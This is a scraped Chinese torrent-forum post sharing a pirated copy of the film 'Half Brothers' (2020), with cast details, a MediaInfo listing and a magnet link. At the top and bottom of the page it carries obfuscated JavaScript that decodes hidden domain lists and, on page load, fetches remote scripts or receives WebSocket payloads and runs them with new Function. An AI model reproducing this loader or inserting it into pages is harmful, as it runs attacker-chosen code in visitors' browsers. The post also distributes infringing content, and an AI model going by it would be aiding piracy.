半血缘兄弟[中文字幕].Half.Brothers.2020.1080p.WEB-DL.H264.AAC 1.64GB

版主小s 1月前 189

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 半血缘兄弟 / Half Brothers

◎片 名 Half Brothers

◎年 代 2020

◎产 地 墨西哥 / 美国

◎类 别 剧情 / 喜剧

◎语 言 西班牙语

◎上映日期 2020-12-04(美国)

◎IMDb链接 https://www.imdb.com/title/tt10515926/

◎豆瓣评分 6.2/10 (374人评价)

◎豆瓣链接 https://movie.douban.com/subject/33437583/

◎片 长 96分钟

◎导 演 卢克·格林菲德 Luke Greenfield (id:1005009)

◎编 剧 阿利·勒鲁伊 Ali LeRoi (id:1289830)

爱德得·西斯内罗斯 Eduardo Cisneros (id:1256671)

杰森·舒曼 Jason Shuman (id:1448124)

◎演 员 路易斯·赫拉尔多·门德斯 Luis Gerardo Méndez (id:1217226)

何塞·祖尼加 José Zú?iga (id:1301811)

康纳·戴尔·里奥 Connor Del Rio (id:1400841)

文森特·斯帕诺 Vincent Spano (id:1027910)

希拉·斯科特·阿斯托夫 Shira Scott Astrof (id:1448125)

哈耶斯·哈格罗夫 Hayes Hargrove (id:1448126)

阿尔玛·西斯内罗斯 Alma Sisneros (id:1448127)

朱万达斯·坎迪斯 Jwaundace Candece (id:1214914)

比阿特丽丝·埃尔南德斯 Beatrice Hernandez (id:1365390)

特蕾莎·德谢尔 Teresa Decher (id:1448128)

曼尼·鲁比奥 Manny Rubio (id:1231178)

斯蒂芬妮·希尔 Stephanie Hill (id:1409741)

◎标 签 公路 / 喜剧 / 墨西哥 / 亲情 / 家庭 / 美国 / 搞笑 / 2020

◎简 介

影片讲述两个同父异母的兄弟揭开垂死父亲的秘密时,他们彼此的关系也受到了考验。

  1. ##### MediaInfo ######

  2. General

  3. Complete name : 半血缘兄弟[email protected]QDDQ.COM.mp4

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom/iso2/avc1/mp41)

  7. File size : 1.64 GiB

  8. Duration : 1 h 36 min

  9. Overall bit rate : 2 435 kb/s

  10. Writing application : Lavf58.29.100


  11. Video

  12. ID : 1

  13. Format : AVC

  14. Format/Info : Advanced Video Codec

  15. Format profile : [email protected]

  16. Format settings : CABAC / 4 Ref Frames

  17. Format settings, CABAC : Yes

  18. Format settings, Reference frames : 4 frames

  19. Codec ID : avc1

  20. Codec ID/Info : Advanced Video Coding

  21. Duration : 1 h 36 min

  22. Bit rate : 2 336 kb/s

  23. Width : 1 920 pixels

  24. Height : 1 080 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Variable

  27. Frame rate : 23.843 FPS

  28. Minimum frame rate : 0.100 FPS

  29. Maximum frame rate : 23.981 FPS

  30. Color space : YUV

  31. Chroma subsampling : 4:2:0

  32. Bit depth : 8 bits

  33. Scan type : Progressive

  34. Bits/(Pixel*Frame) : 0.047

  35. Stream size : 1.57 GiB (96%)

  36. Writing library : ptw-1.0.134 rcm-adapt vs-93 vwk

  37. Color range : Limited

  38. Codec configuration box : avcC


  39. Audio

  40. ID : 2

  41. Format : AAC LC

  42. Format/Info : Advanced Audio Codec Low Complexity

  43. Codec ID : mp4a-40-2

  44. Duration : 1 h 36 min

  45. Bit rate mode : Constant

  46. Bit rate : 92.9 kb/s

  47. Channel(s) : 2 channels

  48. Channel layout : L R

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 46.875 FPS (1024 SPF)

  51. Compression mode : Lossy

  52. Stream size : 64.0 MiB (4%)

  53. Default : Yes

  54. Alternate group : 1




复制代码


TAGS 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:BF05CDAA9716FD76BE6C6D7DA81DD722378FF9AA

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};